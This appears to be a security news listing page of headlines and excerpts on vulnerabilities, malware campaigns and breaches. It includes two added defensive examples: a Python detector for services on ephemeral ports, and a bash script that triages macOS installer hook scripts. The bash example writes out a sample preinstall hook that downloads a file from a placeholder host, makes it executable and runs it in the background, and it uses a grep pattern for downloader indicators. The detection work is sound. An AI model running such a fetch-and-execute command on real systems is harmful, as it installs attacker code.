Security researchers have uncovered a novel Bluetooth tracking vulnerability in Apple’s Find My network – the system powering AirTags and device-finding capabilities across iPhones, iPads, and Macs. Dubbed “nRootTag,” the attack transforms nearly any Bluetooth-enabled computer or smartphone into an…
Authorities Arrested Hacker Behind 90 Major Data Breaches Worldwide
Cybersecurity firm Group-IB, alongside the Royal Thai Police and Singapore Police Force, announced the arrest of a prolific hacker linked to over 90 major data breaches across 25 countries, including 65 attacks in the Asia-Pacific region. The cybercriminal, operating under aliases ALTDOS, DESORDEN,…
Cisco Nexus Vulnerability Allows Attackers to Inject Malicious Commands
Cisco Systems has issued a security advisory for a newly disclosed command injection vulnerability affecting its Nexus 3000 and 9000 Series Switches operating in standalone NX-OS mode. Tracked as CVE-2025-20161 (CVSSv3 score: 5.1, medium severity), the flaw enables authenticated attackers with administrative privileges…
New Wi-Fi Jamming Attack Can Disable Specific Devices
A newly discovered Wi-Fi jamming technique enables attackers to selectively disconnect individual devices from networks with surgical precision, raising alarms across cybersecurity and telecommunications industries. Researchers from Northeastern University and the University of Chicago uncovered this vulnerability in IEEE 802.11…
GitLab Vulnerabilities Allow Attackers to Bypass Security and Run Arbitrary Scripts
GitLab has urgently released security updates to address multiple high-severity vulnerabilities in its platform that could allow attackers to bypass security mechanisms, execute malicious scripts, and access sensitive data. The patches, included in versions 17.9.1, 17.8.4, and 17.7.6 for both…
LibreOffice Flaws Allow Attackers to Run Malicious Files on Windows
A high-severity security vulnerability (CVE-2025-0514) in LibreOffice, the widely used open-source office suite, has been patched after researchers discovered it could allow attackers to execute malicious files on Windows systems by exploiting hyperlink handling mechanisms. The flaw, which impacts versions…
Cisco Nexus Switch Vulnerability Allows Attackers to Cause DoS
Cisco Systems has disclosed a high-severity vulnerability (CVE-2025-20111) in its Nexus 3000 and 9000 Series Switches operating in standalone NX-OS mode. The vulnerability enables unauthenticated attackers to trigger denial of service (DoS) conditions through crafted Ethernet frames. Rated 7.4 on…
Threat Actors Using Ephemeral Port 60102 for Covert Malware Communications
Recent cybersecurity investigations have uncovered a technique used by threat actors to evade detection during malware distribution. Attackers are serving malware on port 60102, which lies in the dynamic/ephemeral range (49152-65535) that hosts normally use for short-lived client-side connections rather than for listening services, so defenders rarely expect a server there. This approach bypasses…
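A port in the ephemeral range that several internal hosts connect to, and that sends them large responses, is behaving like a service rather than like the client side of a connection, and that is the anomaly to hunt for. The detector below is an added example, not code from the cited investigation; the flow records are constructed stand-ins for NetFlow/IPFIX, Zeek conn.log or firewall data, and the thresholds are assumptions to tune per environment.

```python
"""Find external hosts serving many clients on ports in the ephemeral range.

Added example, not code from the cited investigation. Flow records below
are constructed; in practice they come from NetFlow/IPFIX, Zeek conn.log
or firewall logs. The port range is IANA's dynamic/private range and the
thresholds are assumptions to tune per environment.
"""

from collections import defaultdict

EPHEMERAL_PORTS = range(49152, 65536)
MIN_DISTINCT_CLIENTS = 2     # a server is something several clients talk to
MIN_BYTES_SERVED = 100_000   # ignore tiny exchanges; a payload download is large

# Constructed flows: (src_ip, dst_ip, dst_port, bytes_from_server)
SAMPLE_FLOWS = [
    ("10.0.0.5", "203.0.113.9", 60102, 1_842_233),
    ("10.0.0.7", "203.0.113.9", 60102, 1_842_233),
    ("10.0.0.9", "203.0.113.9", 60102, 1_842_233),
    ("10.0.0.5", "198.51.100.3", 443, 88_120),      # normal HTTPS, ignored
    ("10.0.0.7", "198.51.100.3", 443, 91_004),
    ("10.0.0.5", "192.0.2.8", 51234, 512),          # single small reply-style flow
    ("10.0.0.5", "192.0.2.8", 52001, 640),
]


def find_ephemeral_services(flows):
    """Group flows by (dst_ip, dst_port) inside the ephemeral range and report
    endpoints that look like services: several distinct clients and a
    substantial volume served back to them."""
    by_endpoint = defaultdict(lambda: {"clients": set(), "bytes": 0, "flows": 0})
    for src, dst, port, served in flows:
        if port not in EPHEMERAL_PORTS:
            continue
        rec = by_endpoint[(dst, port)]
        rec["clients"].add(src)
        rec["bytes"] += served
        rec["flows"] += 1

    hits = []
    for (dst, port), rec in sorted(by_endpoint.items()):
        if len(rec["clients"]) >= MIN_DISTINCT_CLIENTS and rec["bytes"] >= MIN_BYTES_SERVED:
            hits.append({
                "dst": dst,
                "port": port,
                "clients": len(rec["clients"]),
                "flows": rec["flows"],
                "bytes_served": rec["bytes"],
            })
    return hits


if __name__ == "__main__":
    for hit in find_ephemeral_services(SAMPLE_FLOWS):
        print(hit)
```

Passive FTP data channels, WebRTC media and some CDN edges also legitimately listen on high ports, so allowlist those destinations before turning this into an alert; the constructed 192.0.2.8 flows show why the client-count and volume thresholds are needed to keep ordinary reply traffic out of the results.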
LCRYX Ransomware Attacks Windows Machines by Blocking Registry Editor and Task Manager
The LCRYX ransomware, a malicious VBScript-based threat, has re-emerged in February 2025 after its initial appearance in November 2024. Known for encrypting files with the .lcryx extension and demanding $500 in Bitcoin for decryption, this ransomware has evolved with advanced…
Ghostwriter Malware Targets Government Organizations with Weaponized XLS File
A new wave of cyberattacks attributed to the Ghostwriter Advanced Persistent Threat (APT) group has been detected, targeting government and military entities in Ukraine and opposition groups in Belarus. The campaign, active since late 2024, employs weaponized Excel (XLS) files…
Silver Fox APT Hackers Target Healthcare Services to Steal Sensitive Data
A sophisticated cyber campaign orchestrated by the Chinese Advanced Persistent Threat (APT) group, Silver Fox, has been uncovered, targeting healthcare services in North America. The attackers exploited Philips DICOM Viewer software to deploy malicious payloads, including a backdoor remote access…
Windows Virtualization-Based Security Exploited to Develop Highly Evasive Malware
Researchers have shown how attackers can abuse Windows Virtualization-Based Security (VBS) enclaves to create malware that is highly evasive and difficult to detect. VBS enclaves, designed as isolated and secure regions of memory within a process,…
Poseidon Mac Malware Hiding Within PKG Files to Evade Detections
A recent discovery by cybersecurity researchers has revealed that the Poseidon malware, a macOS-targeting trojan, is being delivered inside PKG installer files whose preinstall scripts run the infection before any payload is visibly installed. The preinstall script in question is only 207 bytes and, at the time of the report, was flagged by no engine on VirusTotal; the technique represents a significant…
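A quick triage check for this delivery method, as an added example that is not code from the report: expand the package and look at the installer hook scripts, their size and what they reach for. It assumes the .pkg has already been expanded on a Mac with `pkgutil --expand-full suspicious.pkg expanded/` (with the older `pkgutil --expand`, the Scripts member is a gzipped cpio archive that must be unpacked first) and then inspects that directory tree. The sample tree built by `make_sample_tree`, including its fake preinstall hook and the reserved `.invalid` host name, is constructed so the script runs on any POSIX system; nothing in it is executed.

```bash
#!/bin/sh
# Added example (not from the report): triage installer hook scripts in an
# expanded .pkg tree. Assumes `pkgutil --expand-full pkg expanded/` already
# ran; the sample tree below is constructed to stand in for that output.

# List installer hook scripts (run by Installer, usually as root) under a tree.
list_installer_scripts() {
    find "$1" -type f \( -name preinstall -o -name postinstall \
        -o -name preupgrade -o -name postupgrade \
        -o -name preflight -o -name postflight \) 2>/dev/null | sort
}

# Number of hook scripts found; echoed so callers can check it.
count_installer_scripts() {
    list_installer_scripts "$1" | wc -l | tr -d ' '
}

# Byte size of a file (portable across GNU and BSD wc).
file_size() {
    wc -c < "$1" | tr -d ' '
}

# Print, space-separated and deduplicated, the download/decode/stage/detach
# indicators a script contains. A tiny hook that matches several of these is
# the shape of a one-line downloader rather than a real pre-install task.
script_indicators() {
    grep -oE 'curl|wget|base64|osascript|nohup|/tmp/|chmod \+x' "$1" \
        | sort -u | tr '\n' ' '
}

# Report every hook script with its size and indicators.
report_tree() {
    list_installer_scripts "$1" | while read -r script; do
        printf '%s\t%s bytes\t%s\n' "$script" "$(file_size "$script")" \
            "$(script_indicators "$script")"
    done
}

# Constructed sample tree: a tiny preinstall hook that would fetch and launch
# a second stage. The host is a reserved .invalid name; it is never run.
make_sample_tree() {
    mkdir -p "$1/Scripts" "$1/Payload"
    cat > "$1/Scripts/preinstall" <<'EOF'
#!/bin/sh
curl -fsSL http://example.invalid/s -o /tmp/.s && chmod +x /tmp/.s && nohup /tmp/.s >/dev/null 2>&1 &
EOF
}

sample_dir=$(mktemp -d)
make_sample_tree "$sample_dir"
report_tree "$sample_dir"
```

Point `report_tree` at the real expanded directory instead of the sample; a hook of a few hundred bytes whose only content is a fetch, a `chmod +x` and a detached launch deserves a closer look regardless of what any scanner says about the outer package.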
App with Over 100,000 Downloads from Google Play Steals User Data and Blackmails
A financial management app named Finance Simplified has been revealed as a malicious tool for stealing sensitive user data and engaging in blackmail. Despite its fraudulent nature, the app managed to accumulate over 100,000 downloads from the Google Play Store…
Threat Actors Exploit DeepSeek Craze to Distribute Vidar Stealer Malware
Cybercriminals are exploiting the popularity of the recently launched DeepSeek AI chatbot to distribute the Vidar Stealer malware. According to research by Zscaler ThreatLabz, attackers are using brand impersonation tactics to lure unsuspecting users…
Ransomware Group Data-Leak Sites Increasing as Six New Groups Emerge
The cybersecurity landscape has witnessed a significant uptick in ransomware activity, with six new data-leak sites (DLSs) linked to emerging ransomware groups identified in early 2025. According to Cyjax, these groups include Kraken, Morpheus, GD LockerSec, Babuk2, Linkc, and the…
Researchers Uncover Sensitive Infrastructure Data Tied to $1.4B Bybit Hack by Lazarus Group
In a significant breakthrough, cybersecurity firm Silent Push has uncovered sensitive infrastructure tied to the Lazarus Group, a North Korean state-sponsored Advanced Persistent Threat (APT). This discovery sheds light on the group’s involvement in the historic $1.4 billion cryptocurrency heist…
MITRE Releases OCCULT Framework to Address AI Security Challenges
MITRE has unveiled the Offensive Cyber Capability Unified LLM Testing (OCCULT) framework, a methodology designed to evaluate the risk that large language models (LLMs) could carry out autonomous cyberattacks. Announced on February 26, 2025, the initiative responds to growing concerns that…
Genea IVF Clinic Cyberattack Threatens Thousands of Patient Records
A significant cybersecurity breach at Genea, one of Australia’s largest in vitro fertilization (IVF) providers, has raised alarms among thousands of patients amid concerns that sensitive medical data and treatment schedules may be compromised. The clinic confirmed on Wednesday that…
GRUB2 Flaws Expose Millions of Linux Devices to Exploitation
A critical set of 20 security vulnerabilities in GRUB2, the widely used bootloader for Linux systems, has been revealed, exposing millions of devices to potential secure boot bypass and remote code execution attacks. Discovered during a proactive hardening initiative, these…
Orange Communication Breached – Hackers Allegedly Claim 380,000 Email Records Exposed
Telecommunications provider Orange Communication faces a potential data breach after a threat actor using the pseudonym “Rey” claimed responsibility for leaking 380,000 email records and sensitive corporate data on a dark web forum. The alleged breach, disclosed earlier this week, includes source code, internal invoices,…
Rsync Vulnerabilities Allow Hackers to Take Full Control of Servers – PoC Released
A series of critical security vulnerabilities in the widely used Rsync file synchronization tool have been uncovered, exposing millions of servers to potential takeover by unauthenticated attackers. The flaws, which affect Rsync versions before 3.4.0 (the release that fixes them), enable remote code execution, sensitive…
Millions of WordPress Websites Vulnerable to Script Injection Due to Plugin Flaw
A critical security vulnerability in the Essential Addons for Elementor plugin, installed on over 2 million WordPress websites, has exposed sites to script injection attacks via malicious URL parameters. The flaw, tracked as CVE-2025-24752 and scoring 7.1 (High) on the CVSS scale, allowed attackers to execute…
New Undetectable Batch Script Uses PowerShell and Visual Basic to Install XWorm
A novel malware delivery framework employing advanced obfuscation techniques has evaded detection by security tools for over 48 hours. The attack chain centers around a Batch script that leverages PowerShell and Visual Basic Script (VBS) to deploy either the XWorm…
US Employee Background Check Firm Hacked, 3 Million Records Exposed
DISA Global Solutions, a Houston-based provider of employee background checks and workplace safety services, disclosed a significant cybersecurity incident exposing the personal information of over 3.3 million individuals, including 15,198 Maine residents. The breach occurred on February 9, 2024, but was…